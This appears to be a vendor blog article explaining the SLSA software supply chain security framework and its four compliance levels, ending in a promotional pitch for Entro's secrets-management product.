SLSA

What is SLSA?

Supply Chain Levels for Software Artifacts (SLSA) is a security framework designed to uphold the integrity of software artifacts across the software supply chain, while safeguarding against potential security secrets breaches. It establishes a model for security capabilities and compliance requirements, offering a robust defense against cyber threats and supply chain vulnerabilities.

Unlike traditional security guidelines, SLSA emphasizes automatically generating verifiable metadata instead of providing a checklist of best practices. This metadata is pivotal for making real-world policy decisions and implementing security measures. 

Why SLSA Matters

SLSA is indispensable because all software, regardless of its origin, can potentially contain vulnerabilities and introduce risks to the supply chain. As software systems grow in complexity, it becomes imperative to implement controls and best practices to ensure the integrity of each artifact. SLSA offers clear and recognizable compliance requirements and protective measures, establishing itself as an industry standard for developers and enterprises.

SLSA Applications

SLSA can be applied across various scenarios to safeguard organizations, consumers, and vendors:

• Safeguarding organizations: Internally, SLSA can be adopted by organizations to minimize and mitigate risks stemming from internal sources. It ensures that the binary code deployed in production mirrors the originally tested and reviewed code, while also safeguarding against unauthorized access to secrets.
• Protecting consumers: SLSA aids in reducing risks for consumers utilizing open-source products by establishing connections between built software packages and their sources. Consumers must trust only a few secure build systems rather than relying on thousands of developers with upload permissions to various packages. This also helps in safeguarding against inadvertent exposure of secrets.
• Securing vendors: By mandating vendors to implement SLSA as part of contractual agreements, organizations can mitigate risks for consumers of services and software offered by these vendors. Third-party auditors can certify vendors as SLSA-compliant, instilling confidence in the credibility of the vendor’s claims, including their handling of sensitive information and secrets.

SLSA levels

SLSA comprises four levels that contribute to supply chain security. Each compliance level represents a step towards achieving a higher security posture:

Compliance Level	Description	Key Elements
Level 1	Build process documentation	Comprehensive documentation of all build processes  Metadata detailing sources and dependencies (provenance) Aids in basic code source identification and vulnerability management
Level 2	Protection against tampering	Version control requirement Hosted build service for authenticated provenance Build service trust level determines the tampering prevention extent
Level 3	Extra protection against specific threats	Build and source platforms meeting specific standards Enables auditing and ensures provenance integrity Auditor certification for robust tampering protection
Level 4	Attaining the highest trust and confidence levels	Mandates two-person review of all changes Requires a secure, reproducible build process Ensures a high level of confidence in software integrity and tampering prevention

SLSA Framework

To initiate the SLSA framework, organizations can follow these steps to achieve SLSA 1 and establish a foundation of trust in their systems:

• Setup: Implement a CI/CD or build service if not already in place. While not strictly required at Level 1, utilizing a building service simplifies subsequent steps and prepares for higher levels where necessary.
• Generating provenance: Create source data during the build processes and generate provenance metadata. Higher SLSA levels have stricter requirements for provenance data, offering stronger integrity guarantees.
• Providing provenance data to consumers: Define the ideal state for the project and consider the best level for short-term and long-term needs. 

Conclusion

Organizations require a dependable solution to safeguard their software artifacts from tampering and vulnerabilities in this ever-evolving software landscape. Enter Entro: it’s the ultimate choice, offering multiple pillars that strengthen secrets management, guaranteeing secret protection and in-depth insights into usage and compliance.

Entro empowers security teams with the ability to discover all secrets across various sources, giving complete visibility into the secrets landscape. Secrets enrichment is another critical aspect, as it adds valuable metadata to each secret, allowing for better management and compliance tracking. Entro’s dynamic threat modeling and secret lineage maps clearly show how secrets are used and their associated risks. The correlation of secrets with cloud tokens further enhances security.